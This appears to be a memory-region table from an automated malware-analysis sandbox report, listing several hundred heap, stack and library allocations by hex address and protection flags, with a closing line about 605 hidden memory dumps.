|
||
|
7FF848CAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC013A7000
|
trusted library allocation
|
page read and write
|
||
|
5CCA000
|
stack
|
page read and write
|
||
|
1CC6F20D000
|
heap
|
page read and write
|
||
|
81333FB000
|
stack
|
page read and write
|
||
|
6F2B000
|
heap
|
page read and write
|
||
|
1CC102A2000
|
trusted library allocation
|
page read and write
|
||
|
24CAC770000
|
heap
|
page read and write
|
||
|
70D68FB000
|
stack
|
page read and write
|
||
|
6193000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
31F0000
|
trusted library allocation
|
page read and write
|
||
|
1D971650000
|
heap
|
page read and write
|
||
|
1CC102E9000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6EF5F000
|
heap
|
page read and write
|
||
|
81328FA000
|
stack
|
page read and write
|
||
|
1CC6CF10000
|
heap
|
page read and write
|
||
|
1B7C0D2B000
|
heap
|
page read and write
|
||
|
17F0000
|
trusted library section
|
page read and write
|
||
|
7FF848D86000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC102D4000
|
trusted library allocation
|
page read and write
|
||
|
449A000
|
trusted library allocation
|
page read and write
|
||
|
196F32DF000
|
heap
|
page read and write
|
||
|
7FF848CA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6F330000
|
heap
|
page read and write
|
||
|
1CC0042B000
|
trusted library allocation
|
page read and write
|
||
|
6EAF000
|
stack
|
page read and write
|
||
|
1800000
|
heap
|
page read and write
|
||
|
24CAC7E0000
|
heap
|
page read and write
|
||
|
1D971455000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
514E000
|
stack
|
page read and write
|
||
|
6EB4000
|
heap
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6D1F0000
|
heap
|
page read and write
|
||
|
C6972FE000
|
stack
|
page read and write
|
||
|
1CC6CFF3000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
196F5085000
|
heap
|
page read and write
|
||
|
1CC1001F000
|
trusted library allocation
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
1406EEC0000
|
heap
|
page read and write
|
||
|
5DC9000
|
stack
|
page read and write
|
||
|
24CAC730000
|
heap
|
page read and write
|
||
|
1CC1025E000
|
trusted library allocation
|
page read and write
|
||
|
70D7348000
|
stack
|
page read and write
|
||
|
8132AFE000
|
stack
|
page read and write
|
||
|
1CC6F215000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
CC8000
|
stack
|
page read and write
|
||
|
331D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E30000
|
heap
|
page read and write
|
||
|
1CC00907000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
196F32A0000
|
heap
|
page read and write
|
||
|
7DF4E3DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E5A000
|
trusted library allocation
|
page read and write
|
||
|
196F32B8000
|
heap
|
page read and write
|
||
|
1CC6F65B000
|
heap
|
page read and write
|
||
|
1B7C0E78000
|
heap
|
page read and write
|
||
|
60DA07D000
|
stack
|
page read and write
|
||
|
70D72CE000
|
stack
|
page read and write
|
||
|
12C8CD90000
|
heap
|
page read and write
|
||
|
10E0000
|
trusted library allocation
|
page read and write
|
||
|
742C000
|
stack
|
page read and write
|
||
|
1B7C0CFD000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
196F3305000
|
heap
|
page read and write
|
||
|
196F3255000
|
heap
|
page read and write
|
||
|
54C20FF000
|
stack
|
page read and write
|
||
|
1CC6E9C0000
|
heap
|
page execute and read and write
|
||
|
8132FFD000
|
stack
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
1B7C0C99000
|
heap
|
page read and write
|
||
|
1B7C0D6E000
|
heap
|
page read and write
|
||
|
5DD6000
|
trusted library allocation
|
page read and write
|
||
|
31CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
752D000
|
stack
|
page read and write
|
||
|
1B7C0E75000
|
heap
|
page read and write
|
||
|
2257A930000
|
heap
|
page read and write
|
||
|
1CC102C7000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F283000
|
heap
|
page read and write
|
||
|
BCC000
|
stack
|
page read and write
|
||
|
24CAC739000
|
heap
|
page read and write
|
||
|
24CAE0E0000
|
heap
|
page read and write
|
||
|
77EC000
|
stack
|
page read and write
|
||
|
1F1F5D90000
|
heap
|
page read and write
|
||
|
70D64F8000
|
stack
|
page read and write
|
||
|
1B7C0E7C000
|
heap
|
page read and write
|
||
|
B70000
|
remote allocation
|
page execute and read and write
|
||
|
12C8CF70000
|
heap
|
page read and write
|
||
|
1406EEA0000
|
heap
|
page read and write
|
||
|
5DF1000
|
trusted library allocation
|
page read and write
|
||
|
766D000
|
stack
|
page read and write
|
||
|
1CC6F655000
|
heap
|
page read and write
|
||
|
59D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DDE000
|
trusted library allocation
|
page read and write
|
||
|
5B8E000
|
stack
|
page read and write
|
||
|
C6978FE000
|
stack
|
page read and write
|
||
|
1B7C0AF0000
|
heap
|
page read and write
|
||
|
1B7C0D0E000
|
heap
|
page read and write
|
||
|
1406EEC8000
|
heap
|
page read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
1B7C2A57000
|
heap
|
page read and write
|
||
|
1CC6F5E0000
|
heap
|
page read and write
|
||
|
1CC6CFB1000
|
heap
|
page read and write
|
||
|
1CC102E7000
|
trusted library allocation
|
page read and write
|
||
|
1CC6D00D000
|
heap
|
page read and write
|
||
|
56C159000
|
stack
|
page read and write
|
||
|
24CAC738000
|
heap
|
page read and write
|
||
|
24CAC746000
|
heap
|
page read and write
|
||
|
6EB0000
|
heap
|
page read and write
|
||
|
24CAC6E0000
|
heap
|
page read and write
|
||
|
54C24FE000
|
stack
|
page read and write
|
||
|
3217000
|
heap
|
page read and write
|
||
|
1CC00423000
|
trusted library allocation
|
page read and write
|
||
|
5DF6000
|
trusted library allocation
|
page read and write
|
||
|
635E000
|
stack
|
page read and write
|
||
|
70D627E000
|
stack
|
page read and write
|
||
|
E2E000
|
stack
|
page read and write
|
||
|
1CC10318000
|
trusted library allocation
|
page read and write
|
||
|
326E000
|
stack
|
page read and write
|
||
|
5DFD000
|
trusted library allocation
|
page read and write
|
||
|
1B7C2A5E000
|
heap
|
page read and write
|
||
|
1CC102B7000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F2DB000
|
heap
|
page read and write
|
||
|
1B7C0D78000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
70D73CD000
|
stack
|
page read and write
|
||
|
54C23FE000
|
stack
|
page read and write
|
||
|
1B7C0D3D000
|
heap
|
page read and write
|
||
|
1CC6EF3A000
|
heap
|
page read and write
|
||
|
1B7C0D17000
|
heap
|
page read and write
|
||
|
5970000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
54C1CFE000
|
stack
|
page read and write
|
||
|
5B48000
|
heap
|
page read and write
|
||
|
196F508A000
|
heap
|
page read and write
|
||
|
10F4000
|
trusted library allocation
|
page read and write
|
||
|
70D647E000
|
stack
|
page read and write
|
||
|
1CC6F357000
|
heap
|
page read and write
|
||
|
31D4000
|
trusted library allocation
|
page read and write
|
||
|
1CC00227000
|
trusted library allocation
|
page read and write
|
||
|
10F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CAC770000
|
heap
|
page read and write
|
||
|
1CC00FE4000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0CFD000
|
heap
|
page read and write
|
||
|
24CAC751000
|
heap
|
page read and write
|
||
|
81332FE000
|
stack
|
page read and write
|
||
|
6F1B000
|
heap
|
page read and write
|
||
|
196F3304000
|
heap
|
page read and write
|
||
|
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
|
12C8CDB0000
|
heap
|
page read and write
|
||
|
1CC6F090000
|
heap
|
page read and write
|
||
|
7FF848CBB000
|
trusted library allocation
|
page read and write
|
||
|
81331FE000
|
stack
|
page read and write
|
||
|
1CC102E0000
|
trusted library allocation
|
page read and write
|
||
|
5990000
|
trusted library allocation
|
page read and write
|
||
|
32AC000
|
stack
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
1B7C2A50000
|
heap
|
page read and write
|
||
|
FB1000
|
heap
|
page read and write
|
||
|
1CC10016000
|
trusted library allocation
|
page read and write
|
||
|
596C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6F5F9000
|
heap
|
page read and write
|
||
|
1190000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
5DEE000
|
trusted library allocation
|
page read and write
|
||
|
62DE000
|
stack
|
page read and write
|
||
|
70D66FE000
|
stack
|
page read and write
|
||
|
24CAC751000
|
heap
|
page read and write
|
||
|
5A30000
|
trusted library allocation
|
page read and write
|
||
|
1127000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CAC745000
|
heap
|
page read and write
|
||
|
1CC6F316000
|
heap
|
page read and write
|
||
|
7FF848E82000
|
trusted library allocation
|
page read and write
|
||
|
2257A940000
|
heap
|
page read and write
|
||
|
1B7C2A66000
|
heap
|
page read and write
|
||
|
1B7C0CBA000
|
heap
|
page read and write
|
||
|
5DDB000
|
trusted library allocation
|
page read and write
|
||
|
24CAC751000
|
heap
|
page read and write
|
||
|
1CC6E890000
|
heap
|
page readonly
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
31C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7C2A51000
|
heap
|
page read and write
|
||
|
24CAE520000
|
heap
|
page read and write
|
||
|
1180000
|
trusted library allocation
|
page read and write
|
||
|
F5F000
|
stack
|
page read and write
|
||
|
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
|
1CC10299000
|
trusted library allocation
|
page read and write
|
||
|
81329FE000
|
stack
|
page read and write
|
||
|
12BF000
|
stack
|
page read and write
|
||
|
10BE000
|
stack
|
page read and write
|
||
|
196F3250000
|
heap
|
page read and write
|
||
|
196F3210000
|
heap
|
page read and write
|
||
|
1CC00965000
|
trusted library allocation
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
FAD000
|
heap
|
page read and write
|
||
|
5C8C000
|
stack
|
page read and write
|
||
|
1CC6F190000
|
heap
|
page read and write
|
||
|
7FF848D5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1120000
|
trusted library allocation
|
page read and write
|
||
|
24CAC770000
|
heap
|
page read and write
|
||
|
70D5FDE000
|
stack
|
page read and write
|
||
|
196F3321000
|
heap
|
page read and write
|
||
|
5DE2000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F2F9000
|
heap
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
3C91000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0D2B000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
14E8000
|
stack
|
page read and write
|
||
|
12C8CBA8000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page execute and read and write
|
||
|
1406F0B0000
|
heap
|
page read and write
|
||
|
2257AA00000
|
heap
|
page read and write
|
||
|
51B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D971450000
|
heap
|
page read and write
|
||
|
1CC101A8000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F336000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1620000
|
heap
|
page read and write
|
||
|
32C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
56C47F000
|
stack
|
page read and write
|
||
|
1CC01DB5000
|
trusted library allocation
|
page read and write
|
||
|
70D62FC000
|
stack
|
page read and write
|
||
|
5DD0000
|
trusted library allocation
|
page read and write
|
||
|
55CD000
|
stack
|
page read and write
|
||
|
54C22FE000
|
stack
|
page read and write
|
||
|
14C187D000
|
stack
|
page read and write
|
||
|
24CAE52A000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page execute and read and write
|
||
|
70D5F9E000
|
stack
|
page read and write
|
||
|
1B7C0E70000
|
heap
|
page read and write
|
||
|
1CC6EB80000
|
heap
|
page execute and read and write
|
||
|
C6974FF000
|
stack
|
page read and write
|
||
|
1CC00439000
|
trusted library allocation
|
page read and write
|
||
|
18FC000
|
heap
|
page read and write
|
||
|
1CC102D2000
|
trusted library allocation
|
page read and write
|
||
|
7FF849113000
|
trusted library allocation
|
page read and write
|
||
|
1F1F5E00000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
70D63FE000
|
stack
|
page read and write
|
||
|
1B7C0D4F000
|
heap
|
page read and write
|
||
|
24CAC890000
|
heap
|
page read and write
|
||
|
1F1F5E08000
|
heap
|
page read and write
|
||
|
792E000
|
stack
|
page read and write
|
||
|
C6971FF000
|
stack
|
page read and write
|
||
|
31F2000
|
trusted library allocation
|
page read and write
|
||
|
60DA17F000
|
stack
|
page read and write
|
||
|
5E10000
|
trusted library allocation
|
page read and write
|
||
|
24CAE523000
|
heap
|
page read and write
|
||
|
1CC6E820000
|
heap
|
page read and write
|
||
|
E55000
|
heap
|
page read and write
|
||
|
1406F090000
|
heap
|
page read and write
|
||
|
1CC6F5F7000
|
heap
|
page read and write
|
||
|
1647000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0D69000
|
heap
|
page read and write
|
||
|
1CC10303000
|
trusted library allocation
|
page read and write
|
||
|
1CC10030000
|
trusted library allocation
|
page read and write
|
||
|
1520000
|
heap
|
page read and write
|
||
|
1CC6F60D000
|
heap
|
page read and write
|
||
|
7FF848E51000
|
trusted library allocation
|
page read and write
|
||
|
1CC6E9D3000
|
heap
|
page read and write
|
||
|
6190000
|
heap
|
page read and write
|
||
|
38D5000
|
trusted library allocation
|
page read and write
|
||
|
61DE000
|
stack
|
page read and write
|
||
|
1CC6F387000
|
heap
|
page read and write
|
||
|
1406F170000
|
heap
|
page read and write
|
||
|
7F4D8000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6F2D7000
|
heap
|
page read and write
|
||
|
1CC10001000
|
trusted library allocation
|
page read and write
|
||
|
7FF849410000
|
trusted library allocation
|
page read and write
|
||
|
1CC00001000
|
trusted library allocation
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
196F508A000
|
heap
|
page read and write
|
||
|
24CAC735000
|
heap
|
page read and write
|
||
|
1B7C0BF0000
|
heap
|
page read and write
|
||
|
1B7C0CB9000
|
heap
|
page read and write
|
||
|
1B7C0D2B000
|
heap
|
page read and write
|
||
|
1CC102B1000
|
trusted library allocation
|
page read and write
|
||
|
6EBE000
|
heap
|
page read and write
|
||
|
445C000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F080000
|
heap
|
page execute and read and write
|
||
|
1CC6CF60000
|
heap
|
page read and write
|
||
|
1CC10260000
|
trusted library allocation
|
page read and write
|
||
|
1CC6CF30000
|
heap
|
page read and write
|
||
|
24CAC709000
|
heap
|
page read and write
|
||
|
7FF84914C000
|
trusted library allocation
|
page read and write
|
||
|
1CC6E860000
|
trusted library allocation
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
1CC1021A000
|
trusted library allocation
|
page read and write
|
||
|
70D67FF000
|
stack
|
page read and write
|
||
|
1CC6EF10000
|
heap
|
page read and write
|
||
|
726C000
|
stack
|
page read and write
|
||
|
1CC1030E000
|
trusted library allocation
|
page read and write
|
||
|
7DF4E3DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7C0CE2000
|
heap
|
page read and write
|
||
|
8132DFF000
|
stack
|
page read and write
|
||
|
182D000
|
heap
|
page read and write
|
||
|
1B7C0D12000
|
heap
|
page read and write
|
||
|
78ED000
|
stack
|
page read and write
|
||
|
5F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CCD000
|
stack
|
page read and write
|
||
|
2C8E000
|
stack
|
page read and write
|
||
|
1CC102EB000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0C90000
|
heap
|
page read and write
|
||
|
5960000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
|
1199000
|
trusted library allocation
|
page execute and read and write
|
||
|
C6979FF000
|
stack
|
page read and write
|
||
|
7F4C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F26E000
|
heap
|
page read and write
|
||
|
C6975FF000
|
stack
|
page read and write
|
||
|
70D6576000
|
stack
|
page read and write
|
||
|
1CC10019000
|
trusted library allocation
|
page read and write
|
||
|
70D687E000
|
stack
|
page read and write
|
||
|
1CC6F1B1000
|
heap
|
page read and write
|
||
|
1B7C2A66000
|
heap
|
page read and write
|
||
|
1CC10268000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F607000
|
heap
|
page read and write
|
||
|
1CC102C4000
|
trusted library allocation
|
page read and write
|
||
|
196F32B0000
|
heap
|
page read and write
|
||
|
70D637E000
|
stack
|
page read and write
|
||
|
196F32DB000
|
heap
|
page read and write
|
||
|
1CC6F030000
|
heap
|
page read and write
|
||
|
54C25FB000
|
stack
|
page read and write
|
||
|
1B7C0D0F000
|
heap
|
page read and write
|
||
|
6DAE000
|
stack
|
page read and write
|
||
|
51C0000
|
trusted library allocation
|
page read and write
|
||
|
6CAE000
|
stack
|
page read and write
|
||
|
56C1DE000
|
unkown
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
196F3321000
|
heap
|
page read and write
|
||
|
196F3321000
|
heap
|
page read and write
|
||
|
1CC1026D000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F327000
|
heap
|
page read and write
|
||
|
196F5083000
|
heap
|
page read and write
|
||
|
1808000
|
heap
|
page read and write
|
||
|
1B7C0D1B000
|
heap
|
page read and write
|
||
|
6AED000
|
stack
|
page read and write
|
||
|
5963000
|
trusted library allocation
|
page read and write
|
||
|
F8F787F000
|
stack
|
page read and write
|
||
|
1CC6F0B0000
|
heap
|
page read and write
|
||
|
5F4F000
|
trusted library allocation
|
page read and write
|
||
|
31FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1815000
|
heap
|
page read and write
|
||
|
756E000
|
stack
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
196F5081000
|
heap
|
page read and write
|
||
|
59E0000
|
trusted library allocation
|
page read and write
|
||
|
196F3358000
|
heap
|
page read and write
|
||
|
1F1F6090000
|
heap
|
page read and write
|
||
|
5F90000
|
trusted library allocation
|
page read and write
|
||
|
3473000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC10309000
|
trusted library allocation
|
page read and write
|
||
|
1B7C2A61000
|
heap
|
page read and write
|
||
|
196F31F0000
|
heap
|
page read and write
|
||
|
12C8CF74000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
1B7C0D09000
|
heap
|
page read and write
|
||
|
7FF848CA4000
|
trusted library allocation
|
page read and write
|
||
|
1600000
|
heap
|
page read and write
|
||
|
1CC6F087000
|
heap
|
page execute and read and write
|
||
|
1CC6E9E3000
|
heap
|
page read and write
|
||
|
1CC6E910000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F1F7000
|
heap
|
page read and write
|
||
|
112B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F29000
|
heap
|
page read and write
|
||
|
5A50000
|
heap
|
page read and write
|
||
|
1F1F5DA0000
|
heap
|
page read and write
|
||
|
1164000
|
trusted library allocation
|
page read and write
|
||
|
1D971440000
|
heap
|
page read and write
|
||
|
59F0000
|
trusted library allocation
|
page read and write
|
||
|
1B7C2A66000
|
heap
|
page read and write
|
||
|
31C0000
|
trusted library allocation
|
page read and write
|
||
|
1B7C2A7A000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
1CC6E8D0000
|
trusted library allocation
|
page read and write
|
||
|
DE0000
|
direct allocation
|
page read and write
|
||
|
12C8CBA0000
|
heap
|
page read and write
|
||
|
631E000
|
stack
|
page read and write
|
||
|
1CC6F1C3000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6E880000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
73EF000
|
stack
|
page read and write
|
||
|
F8F750C000
|
stack
|
page read and write
|
||
|
1CC102A7000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0CEB000
|
heap
|
page read and write
|
||
|
70D6679000
|
stack
|
page read and write
|
||
|
70D677E000
|
stack
|
page read and write
|
||
|
13EC000
|
stack
|
page read and write
|
||
|
1CC6F6A7000
|
heap
|
page read and write
|
||
|
24CAC73C000
|
heap
|
page read and write
|
||
|
7FF849430000
|
trusted library allocation
|
page read and write
|
||
|
24CAC70A000
|
heap
|
page read and write
|
||
|
1406F175000
|
heap
|
page read and write
|
||
|
1CC6EFC5000
|
heap
|
page read and write
|
||
|
4431000
|
trusted library allocation
|
page read and write
|
||
|
10F0000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0CD8000
|
heap
|
page read and write
|
||
|
1CC102D6000
|
trusted library allocation
|
page read and write
|
||
|
1CC102DC000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
70D5E93000
|
stack
|
page read and write
|
||
|
1CC01385000
|
trusted library allocation
|
page read and write
|
||
|
5E20000
|
trusted library allocation
|
page read and write
|
||
|
2257A9D5000
|
heap
|
page read and write
|
||
|
12C8CCB0000
|
heap
|
page read and write
|
||
|
7F1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4E3DC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6CFA5000
|
heap
|
page read and write
|
||
|
1CC6F635000
|
heap
|
page read and write
|
||
|
C6970FA000
|
stack
|
page read and write
|
||
|
5969000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FB0000
|
trusted library allocation
|
page read and write
|
||
|
518E000
|
stack
|
page read and write
|
||
|
54C1EFE000
|
stack
|
page read and write
|
||
|
1CC0042D000
|
trusted library allocation
|
page read and write
|
||
|
196F32FF000
|
heap
|
page read and write
|
||
|
1CC6F2EA000
|
heap
|
page read and write
|
||
|
1B7C0D2B000
|
heap
|
page read and write
|
||
|
1B7C0D1A000
|
heap
|
page read and write
|
||
|
1CC10276000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0E7C000
|
heap
|
page read and write
|
There are 605 hidden memdumps, click here to show them.